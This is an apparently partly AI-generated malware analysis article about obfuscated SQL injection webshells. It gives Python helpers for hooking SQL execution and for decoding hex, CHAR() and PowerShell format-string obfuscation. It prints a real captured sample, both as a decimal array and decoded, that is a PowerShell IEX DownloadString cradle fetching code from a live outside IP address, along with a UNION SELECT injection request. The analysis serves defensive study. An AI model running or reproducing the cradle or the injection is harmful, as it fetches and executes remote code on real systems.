title: [Sample Analysis] SQL Injection Analysis

Overview

Analysis of SQL injection-related samples, tools, and so on.

Parts of this article were generated by AI and revised by a human.

SQL injection attacks delivered in WebShell form are almost always obfuscated, so it is hard to read the concrete logic they will execute directly from the sample. The executed statement can still be recovered by hooking the function that is finally called: whatever transformations the sample applies, the plaintext has to pass through that sink.
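The hook-at-the-sink approach above, as an added example that is not part of the original article: a Python sandbox in which every cursor logs the statement it is about to hand to SQLite, and a constructed stand-in "sample" (the hex string SAMPLE_HEX, not a real artifact) that only materializes its query at execution time. The class and function names are this example's own.

```python
import sqlite3

# Constructed stand-in for an obfuscated sample: the statement exists only as a
# hex string until the moment it is handed to the database driver.
SAMPLE_HEX = "53454c454354206e616d652046524f4d2073716c6974655f6d6173746572"


class LoggingCursor(sqlite3.Cursor):
    """Hook point: every statement must pass through execute() to reach SQLite,
    so logging here exposes the plaintext no matter how it was assembled."""
    captured = []  # shared log for the sandbox run

    def execute(self, sql, parameters=()):
        LoggingCursor.captured.append(sql)
        return super().execute(sql, parameters)

    def executemany(self, sql, seq_of_parameters):
        LoggingCursor.captured.append(sql)
        return super().executemany(sql, seq_of_parameters)

    def executescript(self, sql_script):
        LoggingCursor.captured.append(sql_script)
        return super().executescript(sql_script)


class HookedConnection(sqlite3.Connection):
    """Connection that hands out LoggingCursor by default, so the sample
    cannot obtain an unhooked cursor through the normal API."""

    def cursor(self, factory=None):
        return super().cursor(factory or LoggingCursor)


def run_sample(conn):
    """The 'sample' under analysis: decodes and runs its hidden statement."""
    cur = conn.cursor()
    cur.execute(bytes.fromhex(SAMPLE_HEX).decode())
    return cur.fetchall()


def capture_statements():
    """Run the sample against a throwaway in-memory DB; return what it executed."""
    LoggingCursor.captured.clear()
    conn = sqlite3.connect(":memory:", factory=HookedConnection)
    try:
        run_sample(conn)
    finally:
        conn.close()
    return list(LoggingCursor.captured)


if __name__ == "__main__":
    for statement in capture_statements():
        print("executed:", statement)
```

The same idea carries over to PHP webshells (wrap mysqli_query / PDO::query) or to a database proxy: the point is to log at the last function the statement passes through rather than to reverse every encoding layer by hand.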

Common data conversion scripts

Hex to String

Ready-made tools are available online.

Python script
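An added decoder for the hex-to-string step (example code, not the article's own script). It goes a little beyond plain hex: it decodes the encodings that typically hide the real text of a logged SQL injection request, namely URL encoding, MySQL 0x... hex literals, and CHAR()/CHR() calls with decimal code points, and it collapses MSSQL-style 'a'+'b' concatenation. The request line SAMPLE_REQUEST is constructed for this example.

```python
import re
from urllib.parse import unquote

# MySQL-style hex literal (0x...) with an even number of hex digits.
HEX_LITERAL = re.compile(r"0x((?:[0-9A-Fa-f]{2})+)")
# CHAR(65,66,...) / CHR(65) calls carrying decimal code points.
CHAR_CALL = re.compile(r"\bCHA?R\s*\(\s*([0-9]+(?:\s*,\s*[0-9]+)*)\s*\)", re.IGNORECASE)

# Constructed request line, as it might appear in a web server or WAF log.
SAMPLE_REQUEST = (
    "GET /item.php?id=1%20UNION%20SELECT%200x7461626c655f6e616d65"
    "%2CCHAR(117,115,101,114,115)--%20 HTTP/1.1"
)


def hex_to_text(hex_digits):
    """Decode a run of hex digits to text; undecodable bytes become U+FFFD."""
    return bytes.fromhex(hex_digits).decode("utf-8", errors="replace")


def _quote(text):
    # Emit the decoded value as a SQL string literal (embedded quotes doubled)
    return "'" + text.replace("'", "''") + "'"


def decode_sql_payload(raw):
    """Turn an encoded injection payload into readable SQL.

    Order matters: URL decoding first (logs hold the raw request), then the
    SQL-level encodings that only become visible after that step.
    """
    text = unquote(raw)
    text = HEX_LITERAL.sub(lambda m: _quote(hex_to_text(m.group(1))), text)
    text = CHAR_CALL.sub(
        lambda m: _quote("".join(chr(int(n)) for n in m.group(1).split(","))), text
    )
    # MSSQL-style CHAR(..)+CHAR(..) concatenation collapses into one literal
    text = re.sub(r"'\s*\+\s*'", "", text)
    return text


if __name__ == "__main__":
    print(decode_sql_payload(SAMPLE_REQUEST))
    print(decode_sql_payload("CHAR(117)+CHAR(115)"))
```

unquote() is used rather than unquote_plus() on purpose: in a query string a literal + may be the MSSQL concatenation operator, and turning it into a space would destroy that information.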

Decimal char data to plaintext

# Convert decimal character codes to plaintext
data = [38, 40, 34, 123, 48, 125, 123, 49, 125, 34, 32, 45, 102, 32, 39, 73, 69, 39, 44, 39, 88, 39, 41, 32, 40, 40, 38, 40, 34, 123, 49, 125, 123, 50, 125, 123, 48, 125, 34, 45, 102, 39, 116, 39, 44, 39, 110, 101, 119, 45, 39, 44, 39, 111, 98, 106, 101, 99, 39, 41, 32, 40, 34, 123, 49, 125, 123, 48, 125, 123, 50, 125, 34, 32, 45, 102, 39, 101, 116, 46, 119, 101, 98, 99, 108, 105, 101, 39, 44, 39, 110, 39, 44, 39, 110, 116, 39, 41, 41, 46, 40, 34, 123, 52, 125, 123, 48, 125, 123, 51, 125, 123, 49, 125, 123, 50, 125, 34, 45, 102, 32, 39, 111, 39, 44, 39, 115, 116, 114, 39, 44, 39, 105, 110, 103, 39, 44, 39, 119, 110, 108, 111, 97, 100, 39, 44, 39, 100, 39, 41, 46, 73, 110, 118, 111, 107, 101, 40, 40, 34, 123, 51, 125, 123, 54, 125, 123, 48, 125, 123, 49, 125, 123, 52, 125, 123, 50, 125, 123, 53, 125, 34, 32, 45, 102, 32, 39, 47, 47, 49, 53, 54, 46, 50, 51, 52, 46, 57, 52, 46, 49, 57, 52, 58, 39, 44, 39, 52, 39, 44, 39, 49, 39, 44, 39, 104, 116, 116, 112, 39, 44, 39, 48, 39, 44, 39, 49, 52, 47, 118, 68, 97, 109, 117, 39, 44, 39, 58, 39, 41, 41, 41]
 
# Map every code point to its character and join the result
result = ''.join([chr(num) for num in data])
print("转换结果:")
print(result)
# Same text with all spaces removed
print("\n格式化后:")
print(result.replace(' ', ''))

Decoding the data above yields the following script (shown with its string-splitting obfuscation resolved); this is a real attack sample:

IEX ((New-Object Net.WebClient).DownloadString('http://156.234.94.194:40114/vDamu'))
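Applying chr() to the array does not produce the line above directly: what comes out is a PowerShell one-liner whose every token is split across ("{1}{0}" -f 'b','a') format expressions. The added example below (not from the article) resolves those expressions mechanically to reach the author's result. OBFUSCATED is the exact string obtained by decoding the page's array; the URL it contains is the sample's own download location and is handled only as an indicator, never fetched. The keyword pairing in classify() is this example's assumption.

```python
import re

# Obfuscated one-liner recovered by applying chr() to every value of the decimal
# array on this page. The URL is the sample's own download location (a known-bad
# indicator); this script only rewrites text and never contacts it.
OBFUSCATED = r"""&("{0}{1}" -f 'IE','X') ((&("{1}{2}{0}"-f't','new-','objec') ("{1}{0}{2}" -f'et.webclie','n','nt')).("{4}{0}{3}{1}{2}"-f 'o','str','ing','wnload','d').Invoke(("{3}{6}{0}{1}{4}{2}{5}" -f '//156.234.94.194:','4','1','http','0','14/vDamu',':')))"""

# One PowerShell format expression, parentheses included: ("{1}{0}" -f 'b','a').
# Group 1 is the template, group 2 the comma-separated single-quoted arguments.
FORMAT_EXPR = re.compile(r'''\(\s*"([^"]*)"\s*-f\s*((?:'[^']*'\s*,?\s*)+)\)''')


def _resolve_one(match):
    template, raw_args = match.group(1), match.group(2)
    args = re.findall(r"'([^']*)'", raw_args)
    # PowerShell's -f uses the same {index} placeholders as str.format
    literal = template.format(*args)
    # Emit a single-quoted PowerShell literal; embedded quotes are doubled
    return "'" + literal.replace("'", "''") + "'"


def resolve_format_strings(script, max_rounds=50):
    """Rewrite every ("..." -f ...) expression into the literal it evaluates to.

    Repeats until nothing matches, so an expression nested inside another one's
    arguments is resolved inside-out on successive rounds.
    """
    for _ in range(max_rounds):
        script, count = FORMAT_EXPR.subn(_resolve_one, script)
        if count == 0:
            break
    return script


def extract_urls(script):
    """Pull URL indicators out of the de-obfuscated text."""
    return re.findall(r"https?://[^\s'\")]+", script)


def classify(script):
    """Coarse triage label; the IEX + DownloadString pairing is an assumed heuristic."""
    lowered = script.lower()
    if "iex" in lowered and "downloadstring" in lowered:
        return "download-and-execute cradle"
    return "unclassified"


if __name__ == "__main__":
    clear = resolve_format_strings(OBFUSCATED)
    print(clear)
    print("URLs:", extract_urls(clear))
    print("Verdict:", classify(clear))
```

The output keeps the sample's lower-case spelling (PowerShell is case-insensitive) and the & call operator, so it reads &'IEX' ((&'new-object' 'net.webclient').'downloadstring'.Invoke('http://156.234.94.194:40114/vDamu')), which is the line the author gives once normalized. A detection rule that only matches the literal strings IEX or DownloadString would never have fired on the raw array, which is the whole reason the decode step matters.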